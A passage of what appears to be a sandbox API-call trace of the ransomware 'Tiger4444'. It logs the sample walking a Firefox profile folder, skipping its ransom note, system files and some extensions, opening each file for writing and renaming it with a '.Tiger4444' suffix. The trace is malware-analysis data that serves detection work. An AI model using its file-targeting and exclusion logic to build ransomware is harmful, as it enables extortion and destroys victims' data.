returned -1 [0050.251] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.251] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.251] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82f7d598, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.252] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.252] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.252] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.252] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.252] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.252] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82f7d598, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82f7d598, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82f7d598, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.252] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.252] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.252] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a3ab44, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a3ab44, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a3ab44, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="Tiger4444.exe") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2=".") returned 1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="..") returned 1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="windows") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="bootmgr") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="pagefile.sys") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="boot") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="ids.txt") returned -1 [0050.252] lstrcmpiW (lpString1="addons.json", lpString2="NTUSER.DAT") returned -1 [0050.252] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="addons.json" | out: lpString1="addons.json") returned="addons.json" [0050.252] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json", dwFileAttributes=0x0) returned 1 [0050.253] lstrlenW (lpString="addons.json") returned 11 [0050.253] lstrlenW (lpString="Tiger4444") returned 9 [0050.253] lstrcmpiW (lpString1="dons.json", lpString2="Tiger4444") returned -1 [0050.253] lstrlenW (lpString=".dll") returned 4 [0050.253] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.253] lstrlenW (lpString=".lnk") returned 4 [0050.253] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.253] lstrlenW (lpString=".ini") returned 4 [0050.253] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.253] lstrlenW (lpString=".sys") returned 4 [0050.253] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.253] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addons.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.254] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.254] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14170668879) returned 1 [0050.254] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=24) returned 1 [0050.254] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0050.254] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0050.254] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2c8 [0050.256] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0050.256] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.256] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.256] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.256] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.256] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.257] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.257] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.257] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.257] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14170984974) returned 1 [0050.257] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0050.257] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0050.257] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.257] CloseHandle (hObject=0x2c8) returned 1 [0050.257] CloseHandle (hObject=0x260) returned 1 [0050.257] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json.Tiger4444") returned 95 [0050.257] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addons.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addons.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addons.json.tiger4444"), dwFlags=0x1) returned 1 [0050.258] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea98376, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfea98376, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfea98376, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x291, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="addonStartup.json.lz4", cAlternateFileName="ADDONS~1.LZ4")) returned 1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="Tiger4444.exe") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2=".") returned 1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="..") returned 1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="windows") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="bootmgr") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="pagefile.sys") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="boot") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="ids.txt") returned -1 [0050.258] lstrcmpiW (lpString1="addonStartup.json.lz4", lpString2="NTUSER.DAT") returned -1 [0050.258] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="addonStartup.json.lz4" | out: lpString1="addonStartup.json.lz4") returned="addonStartup.json.lz4" [0050.258] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4", dwFileAttributes=0x0) returned 1 [0050.259] lstrlenW (lpString="addonStartup.json.lz4") returned 21 [0050.259] lstrlenW (lpString="Tiger4444") returned 9 [0050.259] lstrcmpiW (lpString1=".json.lz4", lpString2="Tiger4444") returned -1 [0050.259] lstrlenW (lpString=".dll") returned 4 [0050.259] lstrcmpiW (lpString1=".lz4", lpString2=".dll") returned 1 [0050.259] lstrlenW (lpString=".lnk") returned 4 [0050.259] lstrcmpiW (lpString1=".lz4", lpString2=".lnk") returned 1 [0050.259] lstrlenW (lpString=".ini") returned 4 [0050.259] lstrcmpiW (lpString1=".lz4", lpString2=".ini") returned 1 [0050.259] lstrlenW (lpString=".sys") returned 4 [0050.259] lstrcmpiW (lpString1=".lz4", lpString2=".sys") returned -1 [0050.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addonstartup.json.lz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.259] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.259] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14171226457) returned 1 [0050.259] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=657) returned 1 [0050.259] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0050.259] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0050.259] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x2c8 [0050.260] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0xbe0000 [0050.277] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.277] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0050.277] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.277] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0050.277] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.278] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0050.278] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.278] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0050.278] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14173093821) returned 1 [0050.278] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0050.278] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0050.278] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.278] CloseHandle (hObject=0x2c8) returned 1 [0050.278] CloseHandle (hObject=0x260) returned 1 [0050.278] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4.Tiger4444") returned 105 [0050.278] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addonstartup.json.lz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\addonStartup.json.lz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\addonstartup.json.lz4.tiger4444"), dwFlags=0x1) returned 1 [0050.279] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143f0f49, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x143f0f49, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AlternateServices.txt", cAlternateFileName="ALTERN~1.TXT")) returned 1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="Tiger4444.exe") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2=".") returned 1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="..") returned 1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="windows") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="bootmgr") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="pagefile.sys") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="boot") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ids.txt") returned -1 [0050.279] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="NTUSER.DAT") returned -1 [0050.279] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="AlternateServices.txt" | out: lpString1="AlternateServices.txt") returned="AlternateServices.txt" [0050.279] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\AlternateServices.txt", dwFileAttributes=0x0) returned 1 [0050.280] lstrlenW (lpString="AlternateServices.txt") returned 21 [0050.280] lstrlenW (lpString="Tiger4444") returned 9 [0050.280] lstrcmpiW (lpString1="vices.txt", lpString2="Tiger4444") returned 1 [0050.280] lstrlenW (lpString=".dll") returned 4 [0050.280] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0050.280] lstrlenW (lpString=".lnk") returned 4 [0050.280] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0050.280] lstrlenW (lpString=".ini") returned 4 [0050.280] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0050.280] lstrlenW (lpString=".sys") returned 4 [0050.280] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0050.280] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd843d8c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd843d8c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x200a4780, ftLastWriteTime.dwHighDateTime=0x1d31cd6, nFileSizeHigh=0x0, nFileSizeLow=0x44669, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="blocklist.xml", cAlternateFileName="BLOCKL~1.XML")) returned 1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="Tiger4444.exe") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2=".") returned 1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="..") returned 1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="windows") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="bootmgr") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="pagefile.sys") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="boot") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="ids.txt") returned -1 [0050.280] lstrcmpiW (lpString1="blocklist.xml", lpString2="NTUSER.DAT") returned -1 [0050.280] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="blocklist.xml" | out: lpString1="blocklist.xml") returned="blocklist.xml" [0050.281] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml", dwFileAttributes=0x0) returned 1 [0050.281] lstrlenW (lpString="blocklist.xml") returned 13 [0050.281] lstrlenW (lpString="Tiger4444") returned 9 [0050.281] lstrcmpiW (lpString1="klist.xml", lpString2="Tiger4444") returned -1 [0050.281] lstrlenW (lpString=".dll") returned 4 [0050.281] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0050.281] lstrlenW (lpString=".lnk") returned 4 [0050.281] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0050.281] lstrlenW (lpString=".ini") returned 4 [0050.281] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0050.281] lstrlenW (lpString=".sys") returned 4 [0050.281] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0050.281] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\blocklist.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.281] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.281] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14173426047) returned 1 [0050.281] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=280169) returned 1 [0050.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0050.281] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0050.281] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44970, lpName=0x0) returned 0x2c8 [0050.282] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44970) returned 0xbe0000 [0050.299] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.299] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0050.299] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.299] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0050.299] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.299] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0050.299] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.299] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0050.299] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14175226731) returned 1 [0050.299] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0050.299] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0050.299] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.302] CloseHandle (hObject=0x2c8) returned 1 [0050.302] CloseHandle (hObject=0x260) returned 1 [0050.302] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml.Tiger4444") returned 97 [0050.303] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\blocklist.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\blocklist.xml.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\blocklist.xml.tiger4444"), dwFlags=0x1) returned 1 [0050.307] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe9b352a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe9b352a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfe9b352a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0050.307] lstrcmpiW (lpString1="bookmarkbackups", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.307] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.307] lstrcmpiW (lpString1="bookmarkbackups", lpString2="Tiger4444.exe") returned -1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="windows") returned -1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="bootmgr") returned -1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="pagefile.sys") returned -1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="boot") returned -1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="ids.txt") returned -1 [0050.308] lstrcmpiW (lpString1="bookmarkbackups", lpString2="NTUSER.DAT") returned -1 [0050.308] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="bookmarkbackups" | out: lpString1="bookmarkbackups") returned="bookmarkbackups" [0050.308] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0050.308] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb4) returned 0xc7a2e8 [0050.308] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc66328 [0050.308] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe645e15, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe645e15, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="Tiger4444.exe") returned -1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2=".") returned 1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="..") returned 1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="windows") returned -1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="bootmgr") returned 1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="pagefile.sys") returned -1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="boot") returned 1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="ids.txt") returned -1 [0050.308] lstrcmpiW (lpString1="cert8.db", lpString2="NTUSER.DAT") returned -1 [0050.308] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="cert8.db" | out: lpString1="cert8.db") returned="cert8.db" [0050.308] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cert8.db", dwFileAttributes=0x0) returned 1 [0050.309] lstrlenW (lpString="cert8.db") returned 8 [0050.309] lstrlenW (lpString="Tiger4444") returned 9 [0050.309] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0050.309] lstrlenW (lpString=".dll") returned 4 [0050.309] lstrcmpiW (lpString1="8.db", lpString2=".dll") returned 1 [0050.309] lstrlenW (lpString=".lnk") returned 4 [0050.309] lstrcmpiW (lpString1="8.db", lpString2=".lnk") returned 1 [0050.309] lstrlenW (lpString=".ini") returned 4 [0050.309] lstrcmpiW (lpString1="8.db", lpString2=".ini") returned 1 [0050.309] lstrlenW (lpString=".sys") returned 4 [0050.309] lstrcmpiW (lpString1="8.db", lpString2=".sys") returned 1 [0050.309] CreateFileW 